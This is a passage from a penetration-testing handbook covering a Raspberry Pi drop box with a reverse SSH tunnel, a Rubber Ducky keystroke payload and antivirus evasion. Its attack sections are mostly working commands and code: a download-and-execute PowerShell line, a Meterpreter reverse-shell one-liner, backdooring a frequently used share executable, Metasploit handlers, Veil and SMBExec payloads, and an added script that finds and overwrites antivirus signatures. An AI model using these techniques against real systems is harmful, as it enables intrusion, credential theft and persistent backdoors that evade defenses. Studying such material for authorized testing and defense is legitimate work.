        sshpass -p 'PASSWORD' ssh -o "StrictHostKeyChecking no" -f -N -T \
            -R2221:localhost:22 [your server you own] -p22 -l [USERNAME] >> /dev/null &
    fi


Once these modifications are made, we can start up the service:
• ./setup.sh


The setup file will install the proper dependencies, configure the local SSH server, make modifications to the sshd config, and add a cronjob to run the script every two minutes.


On the server (left):

    root@thehackerplaybook:~# netstat -ano | grep 2221
    tcp        0      0 127.0.0.1:2221          0.0.0.0:*               LISTEN      off (0.00/0/0)
    tcp6       0      0 ::1:2221                :::*                    LISTEN      off (0.00/0/0)
    root@thehackerplaybook:~# ssh root@127.0.0.1 -p 2221
    root@127.0.0.1's password:
    Last login: Tue Feb 24 08:13:35 2015 from kali
    root@kali:~# hostname
    kali

On the Raspberry Pi (right):

    root@kali:/opt/pi_phone_home# ./setup.sh
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    openssh-server is already the newest version.
    openssh-client is already the newest version.
    sshpass is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa):
    /root/.ssh/id_rsa already exists.
    Overwrite (y/n)? y
    Enter passphrase (empty for no passphrase):
    Enter same passphrase again:
    Your identification has been saved in /root/.ssh/id_rsa

Dropbox SSH Tunnels





In the terminal on the right, we kicked off setup.sh on our Raspberry Pi 2. Within two minutes, the Pi connects back to our server (on the left) and logs in via SSH, creating a reverse tunnel on port 2221 of the server.


We can see this on our server by running "netstat -ano | grep 2221". If we see the port listening on 127.0.0.1, we know everything has worked. We can now SSH back through that tunnel to have full access to our Raspberry Pi:

• ssh [username on the Raspberry Pi]@127.0.0.1 -p [tunnel port]


As we can see on the left in the image above, we have connected back to our Raspberry Pi through the tunnel over SSH and run hostname. Now, we can kick off scans, run Metasploit, and more.


Remember, after the first time you run this code, it adds a cronjob to run the script every two minutes. So even if you unplug your device and plug it back in, it will automatically connect back to your SSH server. This is a great drop box to plug in and run away from.


Rubber Ducky
(http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe)


The Rubber Ducky is a USB device that presents itself to the computer as a HID (Human Interface Device), i.e. a keyboard. Now that most systems no longer allow autorun by default, we need to get creative. The Rubber Ducky looks just like a standard USB stick, but instead of storing files and data, it stores keystrokes and replays them as if someone were typing at the keyboard. This is how we get around issues like autorun and quickly use keystrokes to compromise a machine.


So if we had physical access to a computer and wanted to compromise the system, what would we do? One way would be to hit the start menu, drop into an administrative CMD shell, and execute a PowerShell one-liner to download and execute a malicious payload. Note that the LEFTARROW/ENTER sequence below is simply answering "Yes" to the UAC prompt, so this only works when the logged-in user is a local administrator; it does not bypass UAC for a standard user. This might look like the following:


Ducky admin$ cat duckycode.txt

    ESCAPE
    REM bring up the start menu
    CONTROL ESCAPE
    DELAY 400
    REM type "cmd" into the search box
    STRING cmd
    DELAY 400
    REM right-click on cmd
    MENU
    DELAY 400
    REM "a" selects "Run as administrator"
    STRING a
    DELAY 600
    REM move to "Yes" on the UAC prompt and accept it
    LEFTARROW
    ENTER
    DELAY 600
    REM run a PowerShell command to download and execute a file (one line)
    STRING cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.102/winword.exe','winword.exe'); (New-Object -com Shell.Application).ShellExecute('winword.exe')"
    ENTER
    REM close the command prompt
    STRING exit
    ENTER


Try these exact same keystrokes on your Windows 7 host and you will see exactly what it is doing.
Now, we can easily change the STRING line to download a PowerShell script instead and execute a
Meterpreter shell:


• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.102 -Lport 8080 -Force


The Duck Encoder used to build the payload can be found on your Rubber Ducky or here:


https://drive.google.com/drive/#folders/OB7uVAbdkMKcXNW1KdnBrOzZtV3c


The Ducky code is written to the microSD card using the following command (this was done
on a Mac, but it is OS independent since the encoder runs on Java).


The encoder jar file takes the code we supplied and writes it to an inject.bin file on the microSD
card. To write your code, it uses the following syntax:


• java -jar encoder.jar -i [your code] -o [location and file to which to write on the
microSD card]


Example:
• admins-mbp:Ducky admin$ java -jar encoder.jar -i duckycode.txt -o /Volumes/Untitled/inject.bin


Hak5 Duck Encoder 2.6.3

Loading File ..... [OK]
Loading Keyboard File ..... [OK]
Loading Language File ..... [OK]
Loading DuckyScript ..... [OK]
DuckyScript Complete..... [OK]


After successfully writing to the microSD card, we can assemble our USB stick again and will be all 
set. Once we plug in this USB drive into a computer, we will see the following on the computer 
screen: 


[Screenshot: the Start menu search results with "Run as administrator" chosen for cmd.exe, and the
resulting "Administrator: C:\Windows\System32\cmd.exe" window (Microsoft Windows [Version 6.1.7601])
running cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile(...) ... .ShellExecute('winword.exe')"]

Rubber Ducky
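To make clear what the encoder jar is actually producing, here is an added example, my own code rather than the book's or Hak5's: a small Python encoder for the DuckyScript subset used above, plus a decoder that turns an inject.bin back into script lines, which goes beyond the text and is handy when you find a Ducky in the field and want to know what it types. The byte layout is an assumption from my reading of the Hak5 Duck Encoder (a flat stream of 2-byte records [HID usage id][modifier bitmask]; a usage id of 0x00 is a delay whose second byte is milliseconds, 0-255, with longer delays split into 0xFF chunks), and the key table covers a US layout only. Check the output against the real encoder before relying on it.

```python
"""DuckyScript <-> inject.bin for the subset used above (added example).
Assumed layout, from my reading of the Hak5 Duck Encoder: 2-byte records
[HID usage id][modifier bitmask]; usage id 0x00 is a delay whose second byte
is milliseconds (0-255), longer delays being split into 0xFF chunks."""

MOD = {"CONTROL": 0x01, "CTRL": 0x01, "SHIFT": 0x02, "ALT": 0x04,
       "GUI": 0x08, "WINDOWS": 0x08, "COMMAND": 0x08}
MOD_NAMES = (("CONTROL", 0x01), ("SHIFT", 0x02), ("ALT", 0x04), ("GUI", 0x08))
# Named keys -> HID usage ids; the first name listed for a code is what decode() prints.
KEYS = {"ENTER": 0x28, "ESCAPE": 0x29, "ESC": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
        "SPACE": 0x2C, "DELETE": 0x4C, "RIGHTARROW": 0x4F, "LEFTARROW": 0x50,
        "DOWNARROW": 0x51, "UPARROW": 0x52, "MENU": 0x65, "APP": 0x65}
# US layout: a..z = 0x04..0x1D, 1..9,0 = 0x1E..0x27, then punctuation.
_PLAIN = "abcdefghijklmnopqrstuvwxyz1234567890"
_PUNCT = {" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31,
          ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38}
_SHIFTED = {"!": "1", "@": "2", "#": "3", "$": "4", "%": "5", "^": "6", "&": "7",
            "*": "8", "(": "9", ")": "0", "_": "-", "+": "=", "{": "[", "}": "]",
            "|": "\\", ":": ";", '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"}


def char_to_key(ch):
    """One printable character -> (usage id, modifier bitmask)."""
    if ch in _SHIFTED:
        return char_to_key(_SHIFTED[ch])[0], MOD["SHIFT"]
    if ch.isupper():
        return char_to_key(ch.lower())[0], MOD["SHIFT"]
    if ch in _PLAIN:
        return 0x04 + _PLAIN.index(ch), 0
    if ch in _PUNCT:
        return _PUNCT[ch], 0
    raise ValueError("no US-layout mapping for %r" % ch)


def encode(script):
    """DuckyScript text -> inject.bin bytes."""
    out = bytearray()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "DELAY":                    # split long waits into 255 ms chunks
            ms = int(arg)
            while ms > 0:
                out += bytes([0x00, min(ms, 255)])
                ms -= 255
        elif cmd == "STRING":                 # one record per typed character
            for ch in arg:
                out += bytes(char_to_key(ch))
        elif cmd in MOD:                      # "CONTROL ESCAPE", "GUI r", "CTRL ALT DELETE"
            mods, parts = MOD[cmd], arg.split()
            while len(parts) > 1 and parts[0].upper() in MOD:
                mods |= MOD[parts.pop(0).upper()]
            if not parts:
                raise ValueError("modifier without a key: " + line)
            code = KEYS.get(parts[0].upper()) or char_to_key(parts[0])[0]
            out += bytes([code, mods])
        elif cmd in KEYS:
            out += bytes([KEYS[cmd], 0x00])
        else:
            raise ValueError("unsupported command: " + line)
    return bytes(out)


def decode(blob):
    """inject.bin bytes -> DuckyScript lines. Delay records are merged when the
    earlier one was a full 0xFF chunk, so DELAY 400 round-trips (a literal
    DELAY 255 followed by another DELAY merges too: an ambiguity of the format)."""
    names, chars = {}, {}
    for name, code in KEYS.items():
        names.setdefault(code, name)
    for ch in _PLAIN + _PLAIN.upper() + "".join(_PUNCT) + "".join(_SHIFTED):
        chars[char_to_key(ch)] = ch
    lines, text, last_chunk = [], "", None

    def flush():
        nonlocal text
        if text:
            lines.append("STRING " + text)
            text = ""

    for i in range(0, len(blob) - 1, 2):
        code, mod = blob[i], blob[i + 1]
        if code == 0x00:                      # delay record
            flush()
            if last_chunk == 0xFF and lines and lines[-1].startswith("DELAY "):
                lines[-1] = "DELAY %d" % (int(lines[-1][6:]) + mod)
            else:
                lines.append("DELAY %d" % mod)
            last_chunk = mod
            continue
        last_chunk = None
        if (code, mod) in chars:              # printable: accumulate into STRING
            text += chars[(code, mod)]
            continue
        flush()                               # named key, maybe with modifiers
        mods = [n for n, bit in MOD_NAMES if mod & bit]
        key = names.get(code) or chars.get((code, 0), "0x%02X" % code)
        lines.append(" ".join(mods + [key]))
    flush()
    return lines
```

Feed encode() the duckycode.txt above and write the result to inject.bin on the microSD card; decode() on a recovered inject.bin gives you the script back, with STRING lines reassembled from consecutive printable keys.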


This is only the beginning of what you can do with a HID device. Two additional sites that describe
additional functionality or provide pre-made scripts to inject into your Rubber Ducky are:


• https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
• http://ducktoolkit-411.rhcloud.com/ScriptSelection.jsp


[Screenshot: the Duck Toolkit payload generator (ScriptSelection.jsp). Reconnaissance scripts offered:
Computer Information, User Information, USB Information, Shared Drive Information, Program Information,
Installed Updates, User Document List, Basic Network Information, Network Scan, Port Scan, Copy Wireless
Profile, Take Screen Captures, Copy FireFox Profile, Extract SAM File. Exploitation scripts offered: Find
and Upload File (FTP), Disable Firewall, Add User, Open Firewall Port, Start Wi-Fi Access Point, Share
C:\ Drive, Enable RDP.]

Rubber Ducky Payloads
Conclusion 


Attacks where you need to be physically onsite require a lot of patience 
and practice. As you probably already know, these types of attacks give 
the largest adrenaline rushes. It is very important to keep calm and make 
sure you know exactly what you need to do and do it as quickly as 
possible. The best scenario for you is to be in and out without alarming 
a single person. My advice: practice, practice, and practice. 


The Quarterback Sneak - Evading AV


My feelings on Anti-Virus (AV) scanners are that they are there to stop the script kiddies or
old malware. If you are using the default settings for Metasploit, or using files you downloaded from
the internet, chances are that you are going to not only get caught, but your whole engagement could be
over. The element of surprise can play a huge part in how successfully you move laterally
through the environment. This chapter will go into how to make sure you stay ahead of the curve
and do not alert AV scanners.


Evading AV 


I regularly run into AV programs that alert on or block the standard Meterpreter payload, Windows
Credential Editor (WCE), or other common penetration testing tools. Even Metasploit's own tooling,
msfvenom and its encoders like Shikata Ga Nai, just isn't cutting it anymore. So here are a slew of
other options.


The Backdoor Factory
(https://github.com/secretsquirrel/the-backdoor-factory) (Kali Linux)


The goal of BDF is to patch executable binaries with user-supplied shellcode while the binary keeps
executing normally, exactly as it did before it was patched. How can you use this to your advantage? Persistence is the key!
First, we need to find a file to add our shellcode to. What is the best method for this?


Research was done by harmj0y on finding the best files to backdoor by searching open shares.{44} What
if we search the file share server for the most recently accessed files? That way we know the files
are regularly used. If you have a command shell on a victim, you can run the following two
commands:
• Powershell.exe "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii found_shares.txt"


This first command finds all the shares on the network that the user has access to. You can either
modify this text file to be more targeted or go the slow route and look at all the files. I have found it best
to modify this file to target the file shares on the network:
• Powershell.exe "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
Invoke-FileFinder -ShareList .\found_shares.txt -FreshEXEs -ExcludeHidden -CheckWriteAccess"


The second command takes the share list and starts enumerating all the executables, recording
their LastAccessTime and LastWriteTime (-CheckWriteAccess keeps only files the current user can
write to, which we need in order to drop the backdoored copy back). In the example below, we see that Procmon.exe on
the file share has the most recent access time. This is an indication that it could be regularly used. If we
modify this file, there is a good chance that it will get executed continually.


[Screenshot: the two PowerView commands run from C:\Users\testuser. found_shares.txt lists
\\DC.hacker.testlab\NETLOGON (logon server share), \\DC.hacker.testlab\Share and a third share;
Invoke-FileFinder then lists executables under \\DC.hacker.testlab\Share (AddInProcess.exe,
AddInProcess32.exe, AddInUtil.exe, aitagent.exe, PrintBrmEngine.exe, ...) with their owner
(BUILTIN\Administrators), LastAccessTime, LastWriteTime and length. The most recently accessed entry,
with a LastAccessTime of 1/28/2015, is the Procmon.exe copy.]

PowerView - Invoke-FileFinder





Let's grab a copy of Procmon.exe from the share and modify that binary. Dropping that binary onto
our Kali host, we can run BDF on it. We are going to modify the Procmon.exe executable to
include a Meterpreter reverse HTTPS payload that connects back to our Kali host over the specified
port.


Open up a terminal and run the following commands:

• cd /opt/the-backdoor-factory/

• ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H <your Kali IP> -P 8080


[Screenshot: backdoor.py output while patching Procmon.exe]

BDF Patching


Once you execute backdoor.py, you need to pick a cave, which is an area of 0's in the binary large enough to hold your
shellcode. If you don't like the locations initially suggested, you can press "j" to jump and see
additional caves.


[Screenshot: BDF listing candidate code caves with their section, size and location]

BDF Caves


Once you find a cave that works, press "a" to append your code. After this is complete, BDF will
drop the newly created executable in the folder backdoored.


Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will 
still have all the functionality of Procmon, but every time they run it, it will connect back to our 
Metasploit handler. 
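To make "cave" concrete, here is an added Python example, my code rather than BDF's: it parses the PE section table and reports every run of NUL bytes inside a section, with the file offset, the RVA it maps to, and whether the section is executable, which is what you need to know before deciding where shellcode can go (a cave in a non-executable section means BDF has to flip section flags or pick another spot). It runs against a constructed, minimal PE32 image built inline, valid in layout but not a loadable program; no real binary is included.

```python
import re
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_sections(pe):
    """Read the COFF section table: (name, raw_offset, raw_size, rva, flags)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        _vsize, rva, raw_size, raw_off = struct.unpack_from("<IIII", pe, off + 8)
        flags = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, raw_off, raw_size, rva, flags))
    return sections


def find_caves(pe, min_size=300):
    """Runs of NUL bytes of at least min_size inside each section's raw data."""
    pattern = re.compile(b"\x00{%d,}" % min_size)
    caves = []
    for name, raw_off, raw_size, rva, flags in parse_sections(pe):
        for m in pattern.finditer(pe[raw_off:raw_off + raw_size]):
            caves.append({
                "section": name,
                "offset": raw_off + m.start(),   # file offset you would patch
                "rva": rva + m.start(),          # where it lands once mapped
                "size": m.end() - m.start(),
                "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            })
    return caves


def build_toy_pe():
    """Constructed PE32 image with a .text cave and a too-small .data gap.
    Only the header fields needed for cave hunting are filled in."""
    opt_size, e_lfanew = 224, 0x80
    text_off, data_off, sec_size = 0x200, 0x600, 0x400
    text = b"\xC3" * 0x100 + b"\x00" * 0x300   # 0x300-byte cave after some RETs
    data = b"\x41" * 0x380 + b"\x00" * 0x80    # 0x80-byte gap, below min_size
    img = bytearray(data_off + sec_size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    struct.pack_into("<HH", img, e_lfanew + 4, 0x14C, 2)   # i386, 2 sections
    struct.pack_into("<H", img, e_lfanew + 20, opt_size)
    struct.pack_into("<H", img, e_lfanew + 24, 0x10B)      # PE32 magic
    table = e_lfanew + 24 + opt_size
    headers = [(b".text", 0x1000, text_off, 0x60000020),   # code | exec | read
               (b".data", 0x2000, data_off, 0xC0000040)]   # data | read | write
    for i, (name, rva, raw_off, flags) in enumerate(headers):
        off = table + 40 * i
        img[off:off + 8] = name.ljust(8, b"\x00")
        struct.pack_into("<IIII", img, off + 8, sec_size, rva, sec_size, raw_off)
        struct.pack_into("<I", img, off + 36, flags)
    img[text_off:text_off + sec_size] = text
    img[data_off:data_off + sec_size] = data
    return bytes(img)


if __name__ == "__main__":
    for cave in find_caves(build_toy_pe()):
        print("%(section)-6s offset=0x%(offset)x rva=0x%(rva)x "
              "size=%(size)d exec=%(executable)s" % cave)
```

Point it at a real file with find_caves(open(path, "rb").read()) and compare the list with what BDF offers; BDF's default minimum cave size is what decides which of these runs it shows you, and the executable flag is why it sometimes has to modify section characteristics.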





[Screenshot: the backdoored Procmon.exe copied back into the Share folder, and Process Monitor
(Sysinternals) running normally for the user]

Malicious Procmon


Just in case you forgot how to create a handler for your file, this is what it will look like. On your
Kali host, copy the following text to a file at /opt/listener.rc:
• use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST <Your Kali IP>
set LPORT 8080
set ExitOnSession false
exploit -j -z


To start your listener, use the following command:
• msfconsole -r /opt/listener.rc


[Screenshot: msfconsole -r /opt/listner.rc starting the Metasploit Framework console (1379 exploits,
777 auxiliary, 222 post, 342 payloads, 37 encoders) and running the resource script: use
exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_https, set LHOST 172.16.151.128, set
LPORT 8080, set ExitOnSession false, exploit -j -z; "Exploit running as background job", handler
listening on https://0.0.0.0:8080/]

Meterpreter Session


Hiding WCE From AV (Windows)


I love Windows Credential Editor (WCE) because it can pull clear-text passwords from memory.
However, the problem with WCE is that pretty much every AV vendor flags this executable. The quick
and simple way to bypass AV is to identify where the AV signature sits inside the
WCE file and modify it.


Example: Evade (Windows)


On your Windows host, open Evade. Evade takes an executable and makes multiple versions of that
file based on a defined chunk size. Let's say you have a 50k file and you want to split it by 5k. It
will make 10 different versions of that file. The first one contains only the first 5k of the file (the
MZ header and some additional information). The second file contains the first 5k plus the next 5k
of data, and so on for the rest of the files.


In the following example, we loaded WCE, defined an output location and hit Split! If we look in the
folder we defined as the output, we see that it chopped up the file.

















[Screenshot: Explorer view of C:\Demo\wce_parse containing TestFile_5000.exe (5 KB),
TestFile_10000.exe (10 KB), TestFile_15000.exe (15 KB) and so on up through TestFile_75000.exe (74 KB),
each file 5,000 bytes larger than the previous one]

Evade Output


We should now have a bunch of different files. If we open a hex editor (HxD) and look at two of the files,
we see that the first 5000 bytes of WCE are in the first file and the first 10,000 bytes are in the second.


[Screenshot: HxD with TestFile_5000.exe and TestFile_10000.exe open side by side. The first file's
last row starts at offset 0x1380, so its last byte is at 0x1387; the second file's last row starts at
0x2700, so its last byte is at 0x270F.]

HEX Output at 10000 Bytes
File Comparison


If we open up the calculator and subtract the two final offsets, 0x270F - 0x1387, we get 0x1388.
Converting 0x1388 to decimal gives 5000. Perfect!


Start with the smallest file (5k) and scan it with your AV of choice. Does an AV signature
trigger on that file? If not, keep going through each version of the file. When you finally do get AV to
trigger, you know that something between the last clean file and the first flagged file contains the bytes the
antivirus program looks for.


















[Screenshot: the wce_parse folder after McAfee's scan. TestFile_5000 through TestFile_125000 are still
present; the larger files have been removed, with McAfee reporting "Potentially Unwanted Program
Blocked - McAfee prevented a potentially unwanted program from running"]

Finding Which File Triggers AV


When dropping the folder containing all of the split files, AV instantly starts alerting the user about
malicious files and cleaning them up. When the cleanup is complete, we see that all of the files
before TestFile_130000 are still present in the folder. That means the bytes the AV signature triggers on
sit between the 125,000-byte mark and the 130,000-byte mark of the file.


Let's see what is at that location. Converting the decimal 125000 to hex gives 0x1E848. Let's
take a look in HxD to see what is there. From offset 0x1E848, we can look around to see what
caused the signature to fire, or we can run Evade again with a smaller chunk size to get more granular.


In this case, it looks like I was able to identify what the signature is looking for: it looks for the
name of the application and the owner.








[Screenshot: HxD with wce.exe open at the flagged region]

Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

0001F550   0A 00 00 00 61 62 00 00 46 6F 72 63 65 64 20 53   ....ab..Forced S
0001F560   61 66 65 20 4D 6F 64 65 20 45 72 72 6F 72 3A 20   afe Mode Error:
0001F570   63 61 6E 6E 6F 74 20 72 65 61 64 20 63 72 65 64   cannot read cred
0001F580   65 6E 74 69 61 6C 73 20 75 73 69 6E 67 20 27 73   entials using 's
0001F590   61 66 65 20 6D 6F 64 65 27 2E 0A 00 0D 0A 00 00   afe mode'.......
0001F5A0   61 62 00 00 25 2E 38 58 3A 00 00 00 25 73 3A 25   ab..%.8X:...%s:%
0001F5B0   73 3A 00 00 25 2E 32 58 00 00 00 00 3A 00 00 00   s:..%.2X....:...
0001F5C0   25 2E 32 58 00 00 00 00 25 2E 38 58 3A 00 00 00   %.2X....%.8X:...
0001F5D0   25 73 3A 25 73 3A 00 00 25 2E 32 58 00 00 00 00   %s:%s:..%.2X....
0001F5E0   3A 00 00 00 25 2E 32 58 00 00 00 00 61 62 00 00   :...%.2X....ab..
0001F5F0   0D 0A 00 00 0A 00 00 00 73 6F 6D 65 74 68 69 6E   ........somethin
0001F600   67 20 74 65 72 72 69 62 6C 65 20 68 61 70 70 65   g terrible happe
0001F610   6E 65 64 21 20 63 6F 75 6C 64 20 6E 6F 74 20 61   ned! could not a
0001F620   6C 6C 6F 63 61 74 65 20 6D 65 6D 6F 72 79 20 66   llocate memory f
0001F630   6F 72 20 6E 65 77 20 6C 69 73 74 21 0A 00 00 00   or new list!....
0001F640-0001F6B0: rows only partly legible in the scan; they hold the WCE banner text, with
"013 Am" visible at 0001F670 and "..Use -h for h" at 0001F6B0

Identifying the String that Triggers AV


With HxD, we can write over these values and save the executable to a new file.


[Screenshot: HxD with the same region of wce.exe after editing]

Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

0001F4F0   25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58   %.2X%.2X%.2X%.2X
0001F500   25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58   %.2X%.2X%.2X%.2X
0001F510   25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58   %.2X%.2X%.2X%.2X
0001F520   25 2E 32 58 25 2E 32 58 25 2E 32 58 25 2E 32 58   %.2X%.2X%.2X%.2X
0001F530   00 00 00 00 55 73 69 6E 67 20 57 43 45 20 57 69   ....Using WCE Wi
0001F540   6E 64 6F 77 73 20 53 65 72 76 69 63 65 2E 2E 2E   ndows Service...
0001F550   0A 00 00 00 61 62 00 00 46 6F 72 63 65 64 20 53   ....ab..Forced S
0001F560-0001F620: unchanged from the previous dump ("afe Mode Error: cannot read credentials using
'safe mode'" ... "something terrible happened! could not allocate memory f")
0001F630-0001F6C0: the banner rows, now overwritten with 41 ("A") bytes:
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
...

Modifying the Signature to Evade AV


I wrote over those values with all A's and saved my file as wce2.exe. Luckily, the signature in this
case was not actually part of the binary executable, but part of the application output. Let's take our
sample to the AV box and run the scan again.


[Screenshot: wce2.exe (195 KB) in the folder, and McAfee reporting "Your computer is secure (no action
required)" and "Scan is done - McAfee did not detect any issues on your PC - No further action is
required"]

Successful AV Scan


After scanning the file, AV was no longer able to pick it up and the application still ran
perfectly. One thing to note is that this worked because the values we modified did not
affect the execution of the executable. If the signature had been based on code that could not be changed
without breaking the program, we would not be able to use this trick. I just wanted to demonstrate some weaknesses of AV signatures
and the concept of how to bypass them.
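As an added example, my own code rather than Evade's or the book's, here is the whole procedure above in Python: build the cumulative prefixes Evade writes, find the first one the scanner flags, bisect inside that window to the exact byte at which detection starts, and then, going one step beyond the text, bisect from the other side by blanking bytes from the front of the file to find where the signature begins, before overwriting the span with "A"s the way we did in HxD. The scanner is a constructed stand-in that flags a fixed banner string, and the sample "binary" is constructed bytes with that banner placed at offset 127000 so the window comes out at 125000-130000 like the WCE run; to use it for real, replace fake_av with a call to your AV's command-line scanner. A real engine may decline to scan a truncated fragment; if so, blank the tail instead of cutting it off, which keeps the file the same size throughout.

```python
"""Locate and neuter a static AV signature by prefix bisection (added example)."""

STEP = 5000  # Evade's chunk size from the text

# Constructed stand-in for the flagged WCE banner; not real WCE bytes.
BANNER = b"Using FakeTool Windows Service..."
# Constructed "binary": MZ, filler, the banner at offset 127000, trailing zeros.
SAMPLE = b"MZ" + b"\x90" * 126998 + BANNER + b"\x00" * 3000


def fake_av(data):
    """Simulated signature scanner: True means 'detected'."""
    return BANNER in data


def overwrite(data, start, end, filler=b"A"):
    """What we did in HxD: replace data[start:end] with filler, same length."""
    return data[:start] + filler * (end - start) + data[end:]


def flagged_window(data, detect, step=STEP):
    """Scan Evade-style prefixes; return (last clean size, first flagged size)."""
    clean = 0
    for n in range(step, len(data) + step, step):
        n = min(n, len(data))
        if detect(data[:n]):
            return clean, n
        clean = n
    return None


def bisect_end(data, detect, clean, flagged):
    """Smallest prefix length in (clean, flagged] that trips the scanner."""
    while flagged - clean > 1:
        mid = (clean + flagged) // 2
        if detect(data[:mid]):
            flagged = mid
        else:
            clean = mid
    return flagged


def bisect_start(data, detect, end, filler=b"A"):
    """Largest offset s such that blanking data[:s] keeps detection alive."""
    lo, hi = 0, end     # invariant: blanking [0, lo) still detected, [0, hi) not
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detect(overwrite(data, 0, mid, filler)):
            lo = mid
        else:
            hi = mid
    return lo


def locate_signature(data, detect, step=STEP):
    """Return (start, end) of the detected bytes, or None if nothing fires."""
    window = flagged_window(data, detect, step)
    if window is None:
        return None
    clean, flagged = window
    end = bisect_end(data, detect, clean, flagged)
    return bisect_start(data, detect, end), end


def neuter(data, detect, step=STEP, filler=b"A"):
    """Overwrite the located span; returns (patched bytes, span)."""
    span = locate_signature(data, detect, step)
    if span is None:
        return data, None
    return overwrite(data, span[0], span[1], filler), span


if __name__ == "__main__":
    print("window:", flagged_window(SAMPLE, fake_av))
    patched, span = neuter(SAMPLE, fake_av)
    print("signature at %d-%d, still detected: %s"
          % (span[0], span[1], fake_av(patched)))
```

The same caveat as with wce2.exe applies: this only works when the located bytes are strings or other data the program does not need intact. If the span lands in code, blanking it breaks the program, and the binary needs a real rewrite (the BDF and peCloak approaches) rather than a hex edit.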


Veil
(https://github.com/Veil-Framework) (Kali Linux)


Veil is a payload generator built to bypass antivirus, created by Christopher Truncer. The tool uses a
lot of different methods to evade AV, but it is best known for taking the Meterpreter stager, generating
it as Python, and compiling that with py2exe/pyinstaller. This way the executable can bypass a lot of
white-listing tools and AV, because Python is usually an approved, white-listed application
and the script can easily be encoded to get past AV signatures. There are a lot of different ways to use Veil, but I
will go over the most general.
• cd /opt/Veil/Veil-Evasion
• ./Veil-Evasion.py
• To see all payloads:
  o list
• We are going to use python/meterpreter/rev_https (25 is its number in the list output; the numbering changes between Veil versions, so check the list first):
  o use 25
  o set LHOST [Your Kali IP]
  o generate
  o use pyinstaller


[Screenshot: Veil-Evasion output for python/meterpreter/rev_https with options LHOST=172.16.151.141
LPORT=8443 compile_to_exe=Y, the executable and payload file written to disk, and the message "Your
payload files have been generated, don't get caught!"]

Veil-Evasion


The output results in two files:


1. Under /root/veil-output/compiled/ is the executable to drop on the Windows system.
2. The other file, /root/veil-output/handlers/undetected_handler.rc, is the Metasploit handler resource file.


First, set up the listener for the handler:
• msfconsole -r /root/veil-output/handlers/undetected_handler.rc


Execute the payload on the Windows victim host: 





Veil-Evasion - Python 


I highly recommend testing with the Ruby executable as well. Instead of using the payload
python/meterpreter/rev_https, select ruby/meterpreter/rev_https. The process is the same, but instead
of a pyinstaller executable, it produces a Ruby executable.





Veil-Evasion - Ruby 


Why pick Ruby over python? This is all about testing which works best for the environment in which 
you are testing. I have seen instances where AV might pick up one type of file, but will not pick up 
another. Keep testing and you will find the best solution for your current situation. 


SMBExec
(https://github.com/pentestgeek/smbexec) (Kali Linux)


SMBExec is a tool developed by brav0hax (https://github.com/brav0hax/smbexec) which contains a
lot of different functionality. In this book, we have used the tool to pull hashes from a domain
controller, but it can also be used to enumerate shares, validate logins, disable UAC, and create an
obfuscated Meterpreter executable. brav0hax utilizes a number of different obfuscation techniques,
including randomization and compiling the payload in native C, to bypass AV (read the source code of
smbexec.sh). This is what we are going to use to create our reverse shell.


To create an obfuscated reverse Meterpreter executable:

• cd /opt/smbexec

• ./smbexec.sh

• Select System Access with the following command:
  o 2

• Select Create an executable and rc script:
  o 2

• Select windows/meterpreter/reverse_https:
  o 2

• Enter your local host and port:
  o 172.16.139.209
  o 443


Once SMBExec finishes and you exit the application, a new folder is created in that same
directory, named with a timestamp. Inside that folder, you will see
backdoor.exe, which is your obfuscated reverse HTTPS Meterpreter executable.


root@kali:/opt/smbexec/2015-03-23-1425-smbexec# ls -alh

-rwxr-xr-x 1 root root 110K Mar 23 14:28 backdoor.exe

